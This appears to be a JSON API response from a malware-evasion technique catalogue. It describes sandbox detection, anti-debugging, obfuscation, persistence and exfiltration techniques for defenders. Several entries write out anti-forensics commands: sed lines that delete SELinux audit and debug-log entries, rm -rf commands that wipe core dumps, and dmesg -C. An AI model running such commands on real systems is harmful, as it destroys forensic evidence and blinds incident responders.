HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 375,
"next": "https://unprotect.it/api/techniques/?format=api&page=2",
"previous": null,
"results": [
{
"id": 394,
"key": "wmi-event-subscriptions",
"unprotect_id": "U1353",
"name": "WMI Event Subscriptions",
"description": "Adversaries may leverage WMI event subscriptions to evade detection by triggering malicious actions only under specific conditions that are unlikely to occur in a sandboxed environment. For instance, a threat actor might configure an event subscription to monitor file system, network, or logon activity, ensuring that their second-stage payload is only downloaded and executed when a particular event suggests real user activity, thereby bypassing automated analysis",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1546\r\nhttps://github.com/1d8/offsec/tree/main/persistence/windows/wmi-event-subscription",
"creation_date": "2025-04-02T07:50:20.849022Z",
"tags": "",
"modification_date": "2025-04-02T07:50:20.849064Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
41
]
},
{
"id": 393,
"key": "removing-commands-from-selinux-audit-logs",
"unprotect_id": "U0312",
"name": "Removing Commands from SELinux Audit Logs",
"description": "SELinux audit logs record all executed commands and policy enforcement actions, including commands like `/bin/web`, `setenforce`, `mount`, and `/bin/rm`. Using `sed -i`, attackers delete specific entries from these logs that could reveal the commands they executed. This manipulation ensures that traces of their activity, such as disabling security policies or deleting evidence, are erased from the audit trail.\r\n\r\nSELinux audit logs provide granular visibility into command execution and policy violations. Attackers exploit this by removing traces of commands that could indicate tampering with the system (e.g., mounting file systems to access restricted areas or deleting files to remove evidence). This eliminates key forensic evidence and blinds investigators to critical actions taken during or after exploitation, reducing the likelihood of detection and hindering incident response efforts.",
"windows": "",
"linux": "### How SELinux Audit Log Manipulation Works on Linux\r\n\r\n#### What Are SELinux Audit Logs?\r\nSELinux (Security-Enhanced Linux) audit logs provide detailed records of:\r\n- **Executed Commands:** Logs all commands run on the system (e.g., `/bin/web`, `setenforce`, `mount`, `/bin/rm`).\r\n- **Policy Enforcement:** Tracks SELinux policy actions, including denials, permission changes, and access violations.\r\n- These logs are typically stored in files like `/var/log/audit/audit.log`.\r\n\r\nSELinux audit logs are critical for understanding command execution, policy violations, and system behavior.\r\n\r\n---\r\n\r\n#### How Are SELinux Audit Logs Manipulated?\r\nAttackers use tools like `sed` to remove specific entries from the audit logs. For example:\r\n\r\n```bash\r\n# Remove entries matching specific commands\r\nsed -i '/bin\\/web/d' /data/var/log/audit/audit.log\r\nsed -i '/setenforce/d' /data/var/log/audit/audit.log\r\nsed -i '/mount/d' /data/var/log/audit/audit.log\r\nsed -i '/bin\\/rm/d' /data/var/log/audit/audit.log\r\n```\r\n\r\n### How `sed` Manipulates SELinux Audit Logs\r\n\r\n#### **Pattern Matching**\r\n- The `sed` command searches for log entries containing specific patterns (e.g., `/bin/web` or `setenforce`) and deletes those lines.\r\n\r\n#### **In-Place Editing (`-i`)**\r\n- The `-i` flag rewrites the log file directly, without creating a backup, effectively erasing the selected entries permanently.\r\n\r\n---\r\n\r\n### **How It Works Internally**\r\n1. **Log Parsing:**\r\n - The `sed` command scans the audit log file line by line, looking for patterns defined by the attacker.\r\n2. **Line Deletion:**\r\n - Any line containing the specified command or activity is removed from the output.\r\n3. **File Overwriting:**\r\n - The modified log file is written back to the original file, leaving no visible trace of the tampering.\r\n\r\n---\r\n\r\n### **How It Can Be Abused**\r\n\r\n#### **Erasing Evidence of Malicious Commands**\r\n- **SELinux logs commands** that might reveal attacker activity, such as:\r\n - `/bin/rm` to delete critical files.\r\n - `mount` to gain access to restricted file systems.\r\n- **By removing these entries, attackers conceal their actions**, making it difficult for investigators to detect malicious behavior.\r\n\r\n#### **Concealing Policy Violations**\r\n- SELinux enforces strict access controls. If attackers:\r\n - Bypass or disable policies (e.g., using `setenforce` to change the SELinux mode), the logs would normally record these actions.\r\n- **Manipulating logs erases evidence** of these violations, making it appear as if SELinux policies were never altered.\r\n\r\n#### **Hindering Forensic Analysis**\r\n- SELinux audit logs are a key resource for incident responders. By removing specific entries, attackers:\r\n - Blind investigators to critical activities.\r\n - Make it harder to identify attack vectors or reconstruct the timeline of events.\r\n\r\n#### **Evading Detection**\r\n- Tools or scripts monitoring SELinux logs for suspicious patterns:\r\n - Will not detect tampered activities because the relevant entries have been erased.",
"macos": "",
"resources": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day?hl=en",
"creation_date": "2025-01-16T00:29:15.998621Z",
"tags": "",
"modification_date": "2025-01-16T00:29:15.998663Z",
"category": [
8
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
6
]
},
{
"id": 392,
"key": "deleting-troubleshoot-information-and-core-dumps",
"unprotect_id": "U0311",
"name": "Deleting Troubleshoot Information and Core Dumps",
"description": "Commands like `rm -rf /data/var/statedumps/*` and `rm -rf /data/var/cores/*` delete state dumps and core dumps, which are generated when processes crash. These files contain memory snapshots, stack traces, and runtime states of processes at the time of failure. They are often used to debug and understand the causes of crashes or application malfunctions.\r\n\r\nAttackers use this technique to eliminate artifacts that could provide direct evidence of exploitation or the presence of malicious payloads in memory. For example, a core dump might reveal details about injected code, command execution, or runtime states that indicate malicious intent. By deleting these files, attackers erase critical forensic evidence, leaving investigators with no memory or process-level data to analyze.",
"windows": "",
"linux": "### How Deleting State Dumps and Core Dumps Works in Linux\r\n\r\n#### What Are State Dumps and Core Dumps?\r\n- **State Dumps:** Files that capture the state of an application or system at a specific point in time, often including diagnostic information for troubleshooting.\r\n- **Core Dumps:** Files generated when a program crashes unexpectedly. They contain a snapshot of the program's memory, including:\r\n - Stack traces (call history leading to the crash).\r\n - Memory content (e.g., variables, heap data, or instructions).\r\n - Register states at the time of the crash.\r\n\r\nThese files are typically stored in directories like `/var/core/`, `/var/crash/`, or custom paths defined by the application (`/data/var/statedumps/` in the example).\r\n\r\n---\r\n\r\n#### How Do Commands Like `rm -rf` Work?\r\nThe commands `rm -rf /data/var/statedumps/*` and `rm -rf /data/var/cores/*` recursively and forcefully remove files within the specified directories:\r\n1. **Recursive Deletion (`-r`):** Deletes all files and subdirectories within the target directory.\r\n2. **Force Option (`-f`):** Ignores warnings, such as permission errors or non-existent files, ensuring deletion proceeds without interruption.\r\n3. **Wildcard (`*`):** Matches all files and directories within the target path.\r\n\r\nFor example:\r\n- `rm -rf /data/var/statedumps/*`: Deletes all state dump files.\r\n- `rm -rf /data/var/cores/*`: Deletes all core dump files.\r\n\r\nThese commands execute quickly and leave no easily accessible trace of the deleted files unless backups or shadow copies exist.\r\n\r\n---\r\n\r\n#### How It Can Be Abused\r\nAttackers use this technique to eliminate critical forensic artifacts that could expose their activities. Here's how:\r\n\r\n1. **Erasing Evidence of Exploitation:**\r\n - Core dumps may reveal traces of memory-resident payloads, such as:\r\n - Shellcode injected during an exploit.\r\n - Malicious commands or operations that caused the crash.\r\n - By deleting core dumps, attackers hide the exact steps or tools used in their exploitation process.\r\n\r\n2. **Hindering Reverse Engineering:**\r\n - Analysts often use core dumps to reconstruct the sequence of events leading to a crash or failure. For example:\r\n - Determining the input that triggered a vulnerability.\r\n - Identifying malicious functions or code injected into memory.\r\n - Without core dumps, it becomes harder to analyze the exploit or payload.\r\n\r\n3. **Concealing Persistence Mechanisms:**\r\n - Core dumps might contain information about how malicious code interacts with the system, such as:\r\n - Environment variables.\r\n - Loaded libraries or modules.\r\n - Deleting these files prevents investigators from identifying potential persistence mechanisms.\r\n\r\n4. **Disrupting Incident Response:**\r\n - State dumps and core dumps provide real-time insights into what went wrong. Deleting them forces responders to rely on less detailed logs or indirect evidence, prolonging the investigation and increasing the chance of missing critical details.",
"macos": "",
"resources": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day?hl=en",
"creation_date": "2025-01-16T00:24:09.965839Z",
"tags": "",
"modification_date": "2025-01-16T00:24:09.965884Z",
"category": [
8
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 391,
"key": "manipulating-debug-logs",
"unprotect_id": "U0310",
"name": "Manipulating Debug Logs",
"description": "Using the `sed -i` command, specific entries in debug logs, such as errors (segfault, SystemError) or trace information (e.g., filenames like main.cc), are surgically removed. This allows attackers to target only incriminating evidence without erasing the entire log file. The process preserves the structure and authenticity of the log while removing key evidence of exploitation or system errors.\r\n\r\nDebug logs often contain detailed information about application crashes, misconfigurations, or errors encountered during exploitation. Removing these entries helps attackers conceal their activities, such as the injection of malicious code, exploitation of vulnerabilities, or abnormal system behavior, make it harder for investigators to identify root causes.",
"windows": "",
"linux": "## What Are Debug Logs?\r\nDebug logs in Linux systems are files that store detailed information about the behavior of applications, services, or the system itself. These logs are primarily used for troubleshooting and debugging. They often include:\r\n\r\n- Application errors and warnings.\r\n- System failures (e.g., segmentation faults).\r\n- Debugging information left by developers.\r\n\r\nThese logs are typically stored in specific directories, such as `/var/log/`, or custom locations defined by the application.\r\n\r\n## How Are Debug Logs Manipulated?\r\nAttackers use tools like `sed` (stream editor) or direct file editing to alter or remove specific entries in debug logs. For example:\r\n\r\n```bash\r\nsed -i '/segfault/d' debuglog\r\n```\r\nThis command does the following:\r\n\r\n- **Searches for a Pattern**: Looks for lines containing the word `segfault` (indicative of segmentation faults or crashes).\r\n- **Deletes Matching Lines**: Removes all occurrences of lines matching the pattern from the file `debuglog`.\r\n- **Preserves the Rest of the File**: Keeps non-matching entries intact, maintaining the overall structure of the log.\r\n\r\nThe `-i` option modifies the file in place without leaving a backup, ensuring minimal traces of the modification.\r\n\r\n## How It Works Internally\r\n- **Pattern Matching**: The `sed` tool processes the log file line by line, comparing each line to the specified pattern (e.g., `segfault`).\r\n- **Line Deletion**: When a match is found, `sed` excludes the line from the output.\r\n- **File Overwriting**: With the `-i` option, `sed` rewrites the original file with the modified content, effectively erasing the targeted entries.\r\n\r\nThis process is lightweight and does not generate new log entries unless monitored by other security mechanisms.\r\n\r\n## How It Can Be Abused\r\nAttackers manipulate debug logs to:\r\n\r\n- **Erase Evidence of Exploitation**: Remove entries showing application crashes, segmentation faults, or other errors that may indicate the use of malicious payloads or exploits.\r\n- **Avoid Detection**: By selectively deleting specific entries (e.g., those containing error messages or traces of exploitation), attackers can make logs appear normal and avoid raising suspicion.\r\n- **Mislead Investigators**: By keeping the rest of the log file intact, attackers create the illusion that the system is functioning correctly, potentially leading investigators to incorrect conclusions.\r\n\r\n### Example Abuse:\r\n- Removing traces of failed exploitation attempts prevents investigators from identifying the attack vector.\r\n- Erasing entries showing malicious behavior, such as unauthorized commands or data access, conceals the attacker's presence.",
"macos": "",
"resources": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day?hl=en",
"creation_date": "2025-01-16T00:19:22.836307Z",
"tags": "linux, sed, logs",
"modification_date": "2025-01-16T00:19:22.836326Z",
"category": [
8
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 390,
"key": "clearing-kernel-message",
"unprotect_id": "U0309",
"name": "Clearing Kernel Message",
"description": "The `dmesg -C` command clears the kernel message buffer, which stores diagnostic messages generated by the kernel. These messages include logs about hardware interactions, system events, kernel module loads, and errors such as segmentation faults. The attacker can run this command to make sure that no trace of kernel-related activity, including any anomalies caused by exploitation, remains in the message buffer.\r\n\r\nInvestigators rely on kernel messages to identify signs of compromise or abnormal behavior, such as unauthorized kernel module loads or system crashes. Attackers can clear the buffer to hide exploitation techniques or tools that interacted directly with the kernel and make it more challenging to identify or reproduce their attack path during forensic analysis.",
"windows": "",
"linux": "## What is `dmesg`?\r\nThe dmesg command in Linux displays the contents of the kernel message buffer. This buffer contains diagnostic and debug information generated by the Linux kernel, including:\r\n\r\n- Hardware initialization during boot.\r\n- Kernel module loading and unloading.\r\n- System errors and warnings.\r\n- Crash dumps or segmentation faults.\r\n\r\nThese messages are critical for system administrators and forensic analysts to debug issues or understand system behavior.\r\n\r\n##What Does `dmesg -C` Do?\r\nThe -C option clears the kernel message buffer. When you run dmesg -C, the kernel overwrites all existing messages in the buffer, leaving it empty.\r\n\r\n- Before execution: Running `dmesg` displays the current messages in the buffer.\r\n- After execution: Running `dmesg` shows no output because the buffer is empty.\r\nThis action does not affect system logs stored in persistent files (e.g., /var/log/kern.log) unless configured to write kernel messages exclusively to the buffer.",
"macos": "",
"resources": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day?hl=en",
"creation_date": "2025-01-16T00:09:53.158064Z",
"tags": "linux, dmesg, kernel",
"modification_date": "2025-01-16T00:14:12.524456Z",
"category": [
8
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 389,
"key": "xprotect-encryption-abuse",
"unprotect_id": "U0711",
"name": "XProtect Encryption Abuse",
"description": "Malware can abuse Apple's macOS XProtect string encryption algorithm to hide critical strings, including commands, browser paths, extension IDs, cryptocurrency wallet locations, and command-and-control (C2) details. \r\n\r\nThis technique leverages the same XOR-based encryption logic implemented in macOS’s XProtect antivirus engine, this encryption is used for “encrypted YARA rules stored within the XProtect Remediator binaries”.\r\n\r\nThe encryption process involves XORing each byte of the string with a key derived from bitwise operations on an encryption key and the byte index. The decrypted output is only available in memory during execution, complicating detection by antivirus solutions.\r\n\r\nThe encrypted strings remain hidden in the malware's binary, and during runtime, a decryption function processes the strings, to reconstruct them in memory for use. For example, malware authors embed encrypted strings related to C2 server URLs or file paths, which are decrypted dynamically when required. \r\n\r\nThe combination of leveraging XProtect’s encryption logic and runtime decryption allows the malware to evade static analysis and signature-based detection methods.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/",
"creation_date": "2025-01-11T03:49:23.825089Z",
"tags": "macOS, malware, XProtect, string encryption,",
"modification_date": "2025-01-11T04:03:24.710956Z",
"category": [
7
],
"rules": [
165
],
"attachments": [],
"featured_api": [],
"contributors": [
5
]
},
{
"id": 388,
"key": "kernel-flag-inspection-via-sysctl",
"unprotect_id": "U0135",
"name": "kernel flag inspection via sysctl",
"description": "The `sysctl` anti-debugging technique can be abused by malware to detect and evade debugging tools on macOS or BSD-like systems. By querying the kernel for process information, malware checks flags (e.g., `0x800`) to see if a debugger is attached. If detected, the malware can terminate, alter behavior, or enter a dormant state to avoid analysis. \r\n\r\nThis technique blends with legitimate system calls, it makes detection harder, and allow to bypass sandboxes analysis. BANSHEE Stealer (`11aa6eeca2547fcf807129787bec0d576de1a29b56945c5a8fb16ed8bf68f782`) uses this method to evade reverse-engineering and maintain stealth.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://www.elastic.co/security-labs/beyond-the-wail",
"creation_date": "2025-01-11T03:00:07.056523Z",
"tags": "",
"modification_date": "2025-01-11T03:40:25.992268Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 387,
"key": "exfiltration-via-smtp",
"unprotect_id": "U0912",
"name": "Exfiltration via SMTP",
"description": "Exfiltration via SMTP is a technique where attackers leverage the Simple Mail Transfer Protocol (SMTP) to exfiltrate data. This method involves sending stolen data, such as sensitive files or system information, via email to an attacker-controlled email account. By using email traffic, attackers can often bypass traditional network monitoring solutions since SMTP traffic is usually deemed legitimate.\r\n\r\nTo execute such exfiltration, attackers can embed hardcoded credentials within malware to connect to an email server. The malware sends the exfiltrated data as email attachments, taking advantage of popular SMTP providers like Gmail or Outlook to facilitate the transfer. The use of SSL/TLS encryption for securing emails further complicates detection efforts.\r\n\r\nAlthough this specific example is focused on data exfiltration, SMTP can also be adapted to function as a communication channel for C2 by encoding commands and responses within email messages.",
"windows": "",
"linux": "",
"macos": "",
"resources": "",
"creation_date": "2025-01-09T04:37:44.929568Z",
"tags": "Email, Exfiltration, SMTPabuse",
"modification_date": "2025-01-09T23:45:42.218871Z",
"category": [
9
],
"rules": [
164
],
"attachments": [],
"featured_api": [],
"contributors": [
49
]
},
{
"id": 386,
"key": "xbel-recently-opened-files-check",
"unprotect_id": "U1352",
"name": "XBEL Recently Opened Files Check",
"description": "The `recently-used.xbel` XML file documents recent files on a Linux system that were accessed by applications. By parsing the file & checking how many files were recently accessed, we can determine whether or not a system is likely a sandbox or virtual machine. If a system has a low amount of files being accessed, it's likely a sandbox/VM.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1497/002/",
"creation_date": "2025-01-06T08:52:12.722531Z",
"tags": "",
"modification_date": "2025-01-06T08:54:13.780464Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
41
]
},
{
"id": 385,
"key": "default-windows-wallpaper-check",
"unprotect_id": "U1351",
"name": "Default Windows Wallpaper Check",
"description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. In this particular case, the malware checks to see if the wallpaper set on the machine is the default Windows wallpaper.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1497/002/",
"creation_date": "2024-12-03T08:12:41.791967Z",
"tags": "",
"modification_date": "2024-12-03T08:12:41.792000Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
41
]
},
{
"id": 384,
"key": "event-triggered-execution-linux-inotify",
"unprotect_id": "U1245, T1546",
"name": "Event Triggered Execution: Linux Inotify",
"description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1546/",
"creation_date": "2024-11-18T09:49:16.128823Z",
"tags": "",
"modification_date": "2024-11-18T09:49:16.128870Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
41
]
},
{
"id": 383,
"key": "replication-through-removable-media",
"unprotect_id": "U1012,T1091",
"name": "Replication Through Removable Media",
"description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1091/",
"creation_date": "2024-10-18T07:26:57.549770Z",
"tags": "",
"modification_date": "2024-10-18T07:27:44.343605Z",
"category": [
10,
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
41
]
},
{
"id": 382,
"key": "vba-purging",
"unprotect_id": "U0524",
"name": "VBA Purging",
"description": "VBA Purging is an obfuscation technique designed to evade detection mechanisms used in malware analysis. When a VBA macro is added to a Microsoft Office document, it is stored in two sections: the **PerformanceCache** (compiled VBA code) and the **CompressedSourceCode** (compressed VBA source code). In VBA Purging, the PerformanceCache (compiled code) is completely removed from the module stream, along with associated streams like `_SRP_`, which contain version-dependent compiled code data. Additionally, the `MODULEOFFSET` is set to `0` to indicate there is no compiled code.\r\n\r\nBy eliminating the PerformanceCache and its related components, VBA Purging prevents static analysis tools, antivirus programs, and YARA rules from detecting suspicious strings typically found in compiled VBA macros. The document retains its compressed VBA source code, but the compiled code, which many detection tools rely on, is no longer present. As a result, macros can still run using the decompressed source code, but security systems are less likely to detect them.\r\n\r\nThis technique is particularly useful for attackers as it significantly reduces detection rates in environments like VirusTotal, where purged documents show a much lower detection rate compared to non-purged versions.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://blog.didierstevens.com/2020/06/22/vba-purging/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/purgalicious-vba-macro-obfuscation-with-vba-purging/?hl=en\r\nhttps://blog.nviso.eu/2020/02/25/evidence-of-vba-purging-found-in-malicious-documents/\r\nhttps://github.com/mandiant/OfficePurge\r\nhttps://beta-v1.malva.re/File/730a8401140edb4c79d563f306ca529e/Report\r\nhttps://beta-v1.malva.re/File/2433e76542036ab53b138a98eeda548a/Report",
"creation_date": "2024-09-20T08:23:29.515300Z",
"tags": "",
"modification_date": "2024-09-20T08:23:29.515342Z",
"category": [
2
],
"rules": [
162
],
"attachments": [],
"featured_api": [],
"contributors": [
45
]
},
{
"id": 381,
"key": "qemu-cpu-brand-evasion",
"unprotect_id": "U1350",
"name": "QEMU CPU brand evasion",
"description": "QEMU has the CPU brand value of \"QEMU Virtual CPU\" if KVM is not based on the VM",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/kernelwernel/VMAware",
"creation_date": "2024-09-02T15:41:22.679172Z",
"tags": "",
"modification_date": "2024-09-02T15:41:22.679195Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 380,
"key": "bochs-cpu-oversights-evasion",
"unprotect_id": "U1349",
"name": "bochs CPU oversights evasion",
"description": "bochs has multiple oversights in its CPU emulation, which allows us to detect if we're running in a bochs emulator:\r\n\r\nbochs may have invalid CPU brands that don't exist.\r\n\r\n* For AMD CPUs, the \"p\" in \"processor\" should be in capital, which bochs doesn't implement.\r\n* AMD CPUs have easter eggs for their K7 and K8 CPUs (\"IT'S HAMMER TIME\"), but bochs does not * implement this.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://pferrie.tripod.com/papers/attacks2.pdf",
"creation_date": "2024-08-30T07:03:34.377546Z",
"tags": "",
"modification_date": "2024-08-30T07:03:34.377573Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 379,
"key": "al-khaser_writewatch",
"unprotect_id": "U0134",
"name": "Al-Khaser_WriteWatch",
"description": "Default invalid parameter values of Al-Khaser's Anti-Debug technique (VirtualAlloc/MEM_WRITE_WATCH). Used for checking API hooks in debuggers/sandboxes.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/LordNoteworthy/al-khaser/blob/967afa0d783ff9625caf1b069e3cd1246836b09f/al-khaser/AntiDebug/WriteWatch.cpp#L85",
"creation_date": "2024-08-19T07:02:04.800544Z",
"tags": "",
"modification_date": "2024-08-19T07:02:04.800589Z",
"category": [
3
],
"rules": [
160
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 378,
"key": "windefavemu_goatfiles",
"unprotect_id": "U1348",
"name": "WinDefAVEmu_goatfiles",
"description": "Goat files inside Defender AV Emulator's file system. Often used in PE malware as an evasion technique to evade executing in Windows Defender's AV Emulator.",
"windows": "",
"linux": "",
"macos": "",
"resources": "",
"creation_date": "2024-08-19T06:52:45.614536Z",
"tags": "",
"modification_date": "2024-08-19T06:59:19.545739Z",
"category": [
1
],
"rules": [
161
],
"attachments": [],
"featured_api": [],
"contributors": [
44
]
},
{
"id": 377,
"key": "ipv4ipv6-obfuscation",
"unprotect_id": "U0710",
"name": "IPV4/IPV6 Obfuscation",
"description": "The obfuscated payload masquerades itself as an array of ASCII IPv4 addresses. Each one of these IPs is passed to the [`RtlIpv4StringToAddressA`](https://learn.microsoft.com/en-us/windows/win32/api/ip2string/nf-ip2string-rtlipv4stringtoaddressa) function, which will translate the ASCII IP string to binary. The binary representation of all of these IPs is combined to form a blob of shellcode. Additionally, IPfuscation variants were spotted using IPv6 instead of IPv4 addresses, UUIDs, and MAC addresses, all operating in almost the same way.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/\r\nhttps://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/\r\nhttps://cyware.com/news/ipfuscation-is-hives-new-technique-to-evade-detection-96c3c748",
"creation_date": "2024-08-19T06:40:08.344835Z",
"tags": "",
"modification_date": "2024-08-19T06:40:08.344877Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
43
]
},
{
"id": 376,
"key": "appinit-dll-injection",
"unprotect_id": "U1244, T1546",
"name": "AppInit DLL Injection",
"description": "Any **Dynamic Link Libraries (DLL)** that are specified within the `AppInit_DLLs` registry key values are loaded by user32.dll into any process that utilizes user32.dll. So by modifying the `AppInit_DLLs` registry key value and pointing it to a malicious DLL, an attacker can force the system to load their DLL into every process that utilizes user32.dll and force it to execute their code.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1546/010/",
"creation_date": "2024-08-17T16:05:00.052918Z",
"tags": "",
"modification_date": "2024-08-17T16:08:18.408557Z",
"category": [
4,
10
],
"rules": [],
"attachments": [],
"featured_api": [
313,
321
],
"contributors": [
41
]
},
{
"id": 375,
"key": "vboxenumshares",
"unprotect_id": "U1347",
"name": "VboxEnumShares",
"description": "This method represents a variation of the `WNetGetProviderName(WNNC_NET_RDR2SAMPLE, ...)` approach, which is typically employed to determine if the network share's provider name is specific, such as VirtualBox. Instead of relying on this well-established technique, we utilize `WNetOpenEnum` and `WNetEnumResource` functions to iterate through each network resource. The primary objective is to identify VirtualBox shared folders, which typically feature \"VirtualBox\" or \"VBoxSrv\" substrings in their names. The latter, VBoxSrv, serves as a pseudo-network redirector provided by VirtualBox, enabling access to shared folders within the guest OS. These folders are sub-resources of the VirtualBox Shared Folder resource. By systematically enumerating these folders, a malware sample can ascertain the presence of the hypervisor in an alternative manner.",
"windows": "",
"linux": "",
"macos": "",
"resources": "",
"creation_date": "2024-08-17T07:29:17.120471Z",
"tags": "",
"modification_date": "2024-08-17T07:29:17.120515Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
36
]
},
{
"id": 374,
"key": "cronos-crypter",
"unprotect_id": "U1437",
"name": "Cronos-Crypter",
"description": "Cronos-Crypter is an open-source crypter publicly available on GitHub. The crypter applies AES encryption or XOR obfuscation to a selected payload before storing it as a .NET resource of a final generated .NET executable payload. Cronos-Crypter contains multiple capabilties for persistence and defense evasion. An operator may select persistence via a Windows Registry autorun key or a Scheduled Task. An operator may also select for decrypted payloads to be injected into a newly spawned copy of itself or `regasm.exe`. To further evade defenses, the operator may also specify to introduce a sleep delay, bypass AMSI controls, and avoid execution within virtual machine environments.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/TalosSec/Cronos-Crypter",
"creation_date": "2024-08-17T07:18:57.605535Z",
"tags": "",
"modification_date": "2024-08-17T07:18:57.605578Z",
"category": [
12
],
"rules": [
158
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 373,
"key": "odd-thread-count",
"unprotect_id": "U1346",
"name": "Odd Thread Count",
"description": "The thread count of the CPU must be an even number, which allows us to detect whether the thread count has been modified through the VM creation stage. If the thread count is not an even number, this is a sign of thread tampering (with a few exceptions which are already covered).",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://en.wikichip.org/wiki/WikiChip",
"creation_date": "2024-08-17T07:04:12.123607Z",
"tags": "",
"modification_date": "2024-08-17T07:04:12.123649Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 372,
"key": "hyper-v-signature",
"unprotect_id": "U1345",
"name": "Hyper-V Signature",
"description": "Hyper-V has a signature value of \"Hv#1\" in eax if leaf `0x40000001` is provided to CPUID.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/tlfs/feature-discovery",
"creation_date": "2024-08-17T07:01:43.936498Z",
"tags": "",
"modification_date": "2024-08-17T07:01:43.936541Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 371,
"key": "ntdelayexecution",
"unprotect_id": "U1344,U0133",
"name": "NtDelayExecution",
"description": "[NtDelayExecution](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtDelayExecution.html) can be used to delay the execution of the calling thread. NtDelayExecution accepts a parameter \"DelayInterval\", which is the number of milliseconds to delay. Once executed, NtDelayExecution \"pauses\" execution of the calling program whuch can cause a timeout of the sandbox or loss of control in a debugger. \r\n\r\nAdditionally, some higher level WinAPI functions invoke NtDelayExeuction. For example, the WinAPI function [Beep](https://learn.microsoft.com/en-us/windows/win32/api/utilapiset/nf-utilapiset-beep), which plays an audible tone for a specified number of milliseconds, calls into NtDelayExecution. In this manner, malware can invoke the Beep function to similarly cause a delay in the program execution.",
"windows": "",
"linux": "",
"macos": "",
"resources": "http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtDelayExecution.html\r\nhttps://securityliterate.com/beeeeeeeeep-how-malware-uses-the-beep-winapi-function-for-anti-analysis/",
"creation_date": "2024-08-17T06:49:17.495641Z",
"tags": "",
"modification_date": "2024-08-17T06:53:15.129268Z",
"category": [
1,
3
],
"rules": [],
"attachments": [],
"featured_api": [
629
],
"contributors": [
11
]
},
{
"id": 370,
"key": "runtime-function-decryption",
"unprotect_id": "U0523",
"name": "Runtime Function Decryption",
"description": "This technique is used to store the function body in an encrypted form. They will only be decrypted just before the execution of that code and will be re-encrypted after the code has been executed. \r\n\r\nThis technique is used by SmokeLoader to evade anti-virus and EDRs, since the function body is in encrypted form except at the time of execution of the function. It also makes the static analysis of SmokeLoader harder.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://irfan-eternal.github.io/understanding-internals-of-smokeloader/#encrypted-function-code",
"creation_date": "2024-03-22T06:30:48.583023Z",
"tags": "encryption, smokeloader",
"modification_date": "2024-03-22T06:30:48.583077Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
38
]
},
{
"id": 369,
"key": "blockinput",
"unprotect_id": "U1011",
"name": "BlockInput",
